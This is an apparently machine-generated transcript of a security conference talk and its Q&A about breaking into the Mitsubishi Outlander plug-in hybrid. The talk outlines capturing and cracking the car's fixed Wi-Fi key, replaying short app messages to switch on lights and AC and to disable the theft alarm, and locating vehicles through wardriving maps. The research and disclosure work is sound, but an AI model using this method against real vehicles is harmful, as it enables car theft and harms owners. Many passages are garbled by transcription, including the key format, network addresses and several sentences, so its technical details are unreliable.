 Well, good morning everybody. Hello, my name's Ken And I've got a short talk today to talk about some work we did on the Mitsubishi Outlander Plug-in hybrid SUV. Now the good news is is right now this vehicle is not shipping in the US I believe it ships in the fall this year, but we've got about a hundred thousand of these across Europe and Asia So they're everywhere. I really really wanted to bring the vehicle with me But it wouldn't fit in my check baggage unfortunately, so you've got to put up with my videos I'm afraid It's not a long talk It's a ridiculously simple hack. It's not complicated I hope that you will be as surprised as I was when we found these bugs Just blew my mind. Anyway, that it that is my vehicle. Those aren't my plates. I might add unsurprisingly a Little bit of background who are we so we're a company called pentest partners clues in the name with pentesters unsurprisingly Back in the day, I I'm really into electric vehicles And a buddy of mine took delivery of a BMW i3 About two years ago and then got an i8 about a year ago, which is an awesome vehicle. I love it. Absolutely love it You've probably seen various issues with BMW connected drive. They're their mobile application We found one the first couple of years ago It was an issue to do with the way that I remote Which is the mobile app for the i-series vehicles is is configured and there was an issue to do with the way you could force Password resets temporary passwords that are brute-forceable. You could provision a new Version of the mobile app. You could geolocate the vehicle. You could pop the locks and then you're on About a year ago. They had another issue where it was shown that The communications were done plain text that was all fixed and I don't if you saw last week There was another issue published really interesting vulnerability to do with Enumerating VIN numbers. Anyway, there we go I want to tell you about the the mobile app. So this is the mobile app for my vehicle You can do some stuff with it The the key function of it is to set up a charging schedule So if you've got an electric vehicle, you want to charge it on cheaper electricity overnight You can use the application and say right well charge between midnight and 5 a.m Which back home that's when we get cheap rate electricity, which is really cool So my car is half the price to charge up you can also You can send on the AC in the morning So if you're on a hot day cool it off But if you live in the UK you need the heat in the morning because it's freezing and raining. There you go It does some other stuff too What's really unusual is the way that the mobile application connects to the vehicle so if you have a smart vehicle You have a mobile application for it. You probably talk to it using an API using cellular data or maybe Wi-Fi This is different. It uses Wi-Fi to talk directly to an access point on the vehicle and that's really unusual I don't know is anyone else seen another vehicle that works like this It's the first one. I've seen I cannot find another one that does this There is an AP on the vehicle the mobile app talks directly to the vehicle Over Wi-Fi, that's really really unusual and that got me interested I genuinely was in the parking lot at my kids school. This is I didn't make this up genuine And I had I was looking for some Wi-Fi and I saw an unusual access point name pop up Whoa, what's that? What's going on there and spoke to a buddy of mine who kind of looked roughly where as the car went past He said yeah, that's my car. It's like what you have an access point on your car. Yeah, it's really cool So In order to talk Yeah Is it is that working guys one two one two? It's a bit bit crusty. Okay. I'll speak up. Shall I? Yeah, one two one two. Yeah, can we get some more gain on that guys? No, maybe not so I just shout. Yeah, that's much better. Good. Okay So what's some really weird Big access point is encrypted as necessary. It has a free share key. What a surprise In order to connect to it that some PSK is created on a piece of paper in O's man What's really weird is the exciting you can change in the field Although the function doesn't actually work in a theory. You can change it. The pre-check key cannot be changed And that's actually set and you know, I've looked this a while. There's some trouble here. We need to start looking at this So the SSID format to be straightforward. It's the word remote capital letters. You then have two numbers for letters So much the scary bit is the pre-check key format. It is for the lower case alpha It is six digits and the char set low case alpha is 21 characters not 26 Really quick. So we can't wait and shake and cracked it. We use some 970s before those are really going to practice for two and a half days We're building a bigger week at the moment with 16 16 GPUs that's gonna go real quick But if you're in a hurry, you can just upload some one like AWS We calculated the cost as being around a thousand dollars. That's a lot of money But this is a $40,000 vehicle. All right, it's expensive. That's kind of a trade. I think I'd go for actually We're connected to it Really unusual. So it has a stack of that clear dress 192. Once it's a 846 pulled 80 is there But there's no service running. I don't know what that's for up. I can't figure that out But T support 80 80 is open and that's what we got so you can retrieve the VIN As you can see that's disclosed there. You can also see this idea. The big one's not my car And there's some other stuff in there as well. I promise you it's not Pretty obviously binary protocol. It's a game fan Wi-Fi module very very popular module really interesting and quite fun. So Why show up? What do we do? So I hope that's going to work. There we go. So we I'm in the middle of the connection. We sniffed making some requests in this particular case. We We're actually turning on the lights. So let's follow that From one And you get a bunch of junk that of course being a binary protocol stuff into a hex dump and you get a load of interesting data very very The both Messaging so the red is the vehicle talking to the mobile application the blue is the mobile application responding back again It's really hard. I mean we first wanted to fuzz this and see what we could do But it'll only pretty much stand up for one message every 15 seconds or so the entire vehicle status as far as we can Make out goes the application and the entire status go back again. So it's really slow So we started playing around with this had a bit of a look and started seeing messaging popping up Now this particular one we were with any function we ran just Let's turn on the lights and that's a function of your mobile agent It's quite useful if you want to find your video in a car park or a car, you know, in a driveway The only slight challenge with this is that it works when you're in Wi-Fi range It's not like it's telling you to take some Wi-Fi and make the i-way and you don't want anywhere in the book You can end it when you're in Wi-Fi range. I don't know if you've ever mislaid your vehicle in a parking lot But it's on your phone for Wi-Fi. You're there anyway, right? I don't know So we started having a bit of a play around with this and we did the classics. So We chopped up the packet we replayed we chopped again Which function which part of p-cap was was actually making it work and we finally got down to a point where we could successfully make a noise Start to analyze all the packets we're doing so the message would have been sent to explain these So that pretty straightforward the bit through a smoke for a while was actually some of the messaging is six bytes and Some of it is seven bytes that really threw us. We were really struggling to make any progress with this Send that bunch add a check some it's really easy once you can understand how the protocol works It's just not rocket science. So if you want to have some fun Catch the key crack the key Send six bytes and I have video this because I couldn't bring the vehicle with me and this happens So we're no longer replaying. We just took direct car and lights come on Okay, so what it's the lights? Okay, it's electric vehicle. We're gonna start draining the battery a little bit So what you know, it's just lights, right? So then we started having a quick look at the the mobile application Got it over here went in the Android version come on There you go and started seeing how some more of the functionality was working We've done it by replay would every already achieved everything we wanted to But now you can start having a little of three So that class tells you how to construct the messages the interesting bit is down here You can start getting sorry the resolutions a bit crazy You can start seeing various functions here. So these are the commands the values need to say and that will trigger various Actions on the vehicle. So it has a battery heater to dry batteries. So when it's cold You can heat the battery up to make one more efficiently, but there's loads and loads of other fun stuff in there We've had some issues with something making some of these work, but the commands that are quite interesting of these KO kickoff You can see such seeing AC You can start seeing charge presets and that that's where things get quite good fun Do the do the bit where I go Hey And that was the one that got us interested What could possibly go wrong at this point, right? So as I said at the beginning this is about playing around with the the charging schedules That's the primary focus of the application. So you could drive someone's car You could act the Wi-Fi key and then turn on the AC So when their vehicles left on their driveway Run the AC permanently and then you get down there and believe me It's really really annoying when you forget to charge your electric vehicle in the morning It's a real problem. I've had to hybrid so you can still go somewhere, but I really like electric cars You have to put up with my crazy video. I'm afraid this is one we recorded So I want to show you this keep an eye on the hazard lights here So I'm just see the lights are actually flashing there. So the alarm is on okay The show the alarm is working the interior volumetric theft alarm is Operating the only thing I cheated with there a little bit It was like round the wheeler. Otherwise every time I do this demo, I have to replace my driver's side with my glass Kind of awkward so that's operating as it should do. However, if you send it that seven bytes and this happens That's all you need to send it guys. Watch the hazard lights there See they're not going off and the crazy bit is unless you've deadlocked the vehicle you can reach in and pop the door Okay, so we've now deactivated the theft alarm for a vehicle Now the next place we've got quite a lot of work to do on this So you now have access to unhooked diagnostics ports. So the next step was to Just because the Wi-Fi key was too short We coded this up into a nice Python script. So it's all there Now we at the same time is disclosing this we also In registration there and what that does once the access point on the vehicle has no more Wi-Fi parents Has no associations it powers down and in order to re-enable you have to press the remote key button Ten times and that It's really easy to fix this there's another way that it's be she published Which you have to press the remote key 30 times and that has the same effect. I like my version. It's quicker anyway The other fun thing about this is because it uses Wi-Fi It's You can go find the vehicles so this is the UK as I said these aren't shipping in the USA right now But that's UK. They're about 22 23,000 of these vehicles on the road right now They've had a query on wiggle and found 6,000 hits of these vehicles Parked on people's driveways Yeah, that makes things quite different. Does it mean you can find the vehicle? You know it's horrible. You drive to it You capture the handshake you come back a bit later having cracked the key and you take the vehicle now We did some some fun analysis here So we an analyzed the three weeks before we disclosed That's that lock and then we analyze the three-week window after disclosure and still 400 people have left the Wi-Fi enabled on their Outlanders Wow, so you're still disclosing exactly how to hack his vehicles go and find a car Crack the key to save the alarm steal the car Wow, that's just nuts Longer term so there is a function in the mobile app You can actually update the firmware for the vehicle. That's the firmware just unzip it It's got very little deep dog information in so I haven't spent much time looking at this But there's a bunch of strings there you can see how it's so creating the Wi-Fi connection. I think The PSK is derived in here. I'm not sure how yet. We're working on that right now I'm Quite concerned though that in order to fix this bug you're asking the consumer Connect to it over Wi-Fi One thing concerns me is this Wi-Fi connection is quite unstable. It drops out. That's just what you normally Just a little bit scary and I don't know but If that firmware update went wrong, I have quite an expensive bricks out on my driveway, I don't know about you I'll let you know how we get on with the firmware, but it's in the mobile application there I want to talk about disclosure because this is a bit of a train wreck We always We spoke to them we get no response. We spoke to them 10 days later, and I've never had such a weird phone conversation in my life I said they'd have no reports of this anywhere in the world So You just can't launch to speak to the press so I did and I spoke to the BBC and Now I'm it's be sure you think it's very serious is you and I work in mid fairness really hard They've actually really good since I think the reason they had a bit of a fail there is because When we just Not to deal with the security risk Yeah That's awesome, you know, we know what disclosure should have happened, you know, they should have said yeah, that's great Everything we go and show them what the problem is. They fix it. We ain't disclose after I wish that happened I really do There's still lots of stuff. We've got to work on we found the module in the end that took a lot of finding Actually, it's tucked away behind the front line as a costal body network control module. Usually these have gsm modules in but unusually This has got a game-span Wi-Fi module So we spent some time having a look at the connections between that module and can the stuff I'm going around that will be disclosed through to Mitsubishi obviously There is lots of extra functionality in the mobile application that's not used So for example, there is door lock control so you could pop the doors potentially We can't figure out how to make that go at the moment. It's just running out of time The other crazy bit as well is the mobile app. It really is a bit a bit flaky and You know, you're supposed to store sensitive data and stuff This is stored in an unencrypted single life database in the mobile app great And there's some unexpected functions as well. We found that one change gun status. Wow Totally we need to find where that is on my vehicle. It's very James Bond. I'm sure But just to wrap up guys, you know, we've been doing this for a long year a long time but our background is actually in industrial control systems and Scala And actually it translated quite nicely into vehicles and some of the other crazy stuff We've done and are doing you might remember the work. We did in the Wi-Fi tea kettle last year We hacked the IOT fridge last year and already working on their smart fridge this year Well, the crazy thing came out. We were asked to help with CSI cyber write a hack script and that didn't go well Unsurprisingly, we also do quite a bit of work in automotive as well The big challenge you usually have is you know, how do you get hold of the vehicles to have good Joe and get something useful? Anyway, guys, I hope you enjoyed it. We treat about this all the time Great idea, wouldn't it? Yeah I'm sorry is that again How'd you find the vehicle? Okay, so this relies upon Wardrivers going out there and geolocating the vehicles. So there's always a lag. So, you know You might see the vehicle on the road But it you know, it's moved by the time you see updates on wiggle But when it's parked at someone's house, it's highly like it's going to be there next time you drive by in the evening So, yeah, it's obviously wiggle takes time to update Although that said my vehicle was located at a trade show at a booth in London and it had been there 24 hours So, yeah, it was pretty nuts. There's another question. Yeah Have you tried the same thing on the moving vehicle? That's what I want to do next. Yeah, it's obviously you need quite a few people You need someone driving both cars and yeah, we believe it works Wait, have we tried this on a moving vehicle? The answer is no So, yeah, like very much like Charlie Miller and Chris Hull said, you know, we want to do a jeep that's speed next to it But until we reach the can, probably not so much. Sorry, but they have to be in the wide by range Yeah, yeah, it's going to be a wide by range vehicle How did you get the job on a moving vehicle? How did we get the job on a moving vehicle? How did you get the job on a moving vehicle? Sorry, just APK I used JD, but yeah, yeah, JADX or JD, that was in the job for you How much time did you spend on the moving vehicle? Sorry? How much time did you spend on the moving vehicle? How much time? So, probably about a week in total, spread over a couple of months Yeah, so it wasn't a big complicated time-consuming hack, it was really easy Do you think the reason they have a fixed PSA, ESCO, is something deeper that they just too lazy? Maybe they use SNRs again else So, there's probably a deeper question there actually, which is, why use Wi-Fi? I believe the reason is, it's a heck of a lot cheaper than setting up a GSM connection, an API, servers It's just much cheaper, I think, to have a Wi-Fi module connect direct So, I think given that this was done in terms of cost, I think the answer to your question was probably it's done in terms of cost as well It would have been more expensive to code up a method of updating the PSK So you'd be having to push updates into the module, and I think that would have cost more money So, I think it's a question of cost, frankly Yeah, so just go and search the Play Store for Inventek, or mid-specia, you'll get that hit straight away Have you tried any of the vehicles or just mid-specia? Well, that's the thing, we've only really looked at this because it was obvious Wi-Fi I haven't found any more vehicles that actually use Wi-Fi for the interface between the smart application and the vehicle Everything else goes through an API, so the answer to the question is no, because I haven't found another one that does But if you do, please tell me Actually, some cars still use it Really? Yeah Oh, wow That's even better, so it's like a mid-assist, but it contains some of them Cool, I'd really like to know about that, I'd really like to know about that, thank you For the app, do they have also, like, login information? No, but what I mean is that is there a login for the app? No, no, there is the function, you can put a pin in front of the application, but that's actually very easy to bypass So there is no auth, because there's no API But there's a pin, right? If you set it one up, yeah, for the, so there's a second pin you can enable in the self-fine application So, like, there's, after you extract the APA, like, is there a chance that the pin will also be stored? Don't know, I've never looked, actually I guess I've seen a lot of, like, apps do for cars, where they store user names in password Okay Yeah, I've never seen that So I think maybe there's also a chance that they store things Yeah, that's a good thought, yeah On the shared graphs, because, like, they remember That's a good thought, man, thank you Good Question, yes I can understand, how, how are these, how is the local lab, the legit owner, joined, not, not by You know, you have to write that key, like, I think it's about that, that, that There isn't, there was no further authentication to the vehicle Right It's the PSK, and that is it Yeah Yeah, it really is, it's, once you've cracked the key, you've got the car But how does it, how does it, how, I mean But there isn't, so they get the key in the manual, so it's printed in the owner's manual Yeah Yeah, yeah, you do have to crack a key per vehicle, yeah, quite, yeah Yeah, but there is no further off, I know, crazy Cool, any more questions? Guys, if anyone wants anything urgent, I'll be in the IoT Village for the next two days Working on the fridge, so maybe see you there, thank you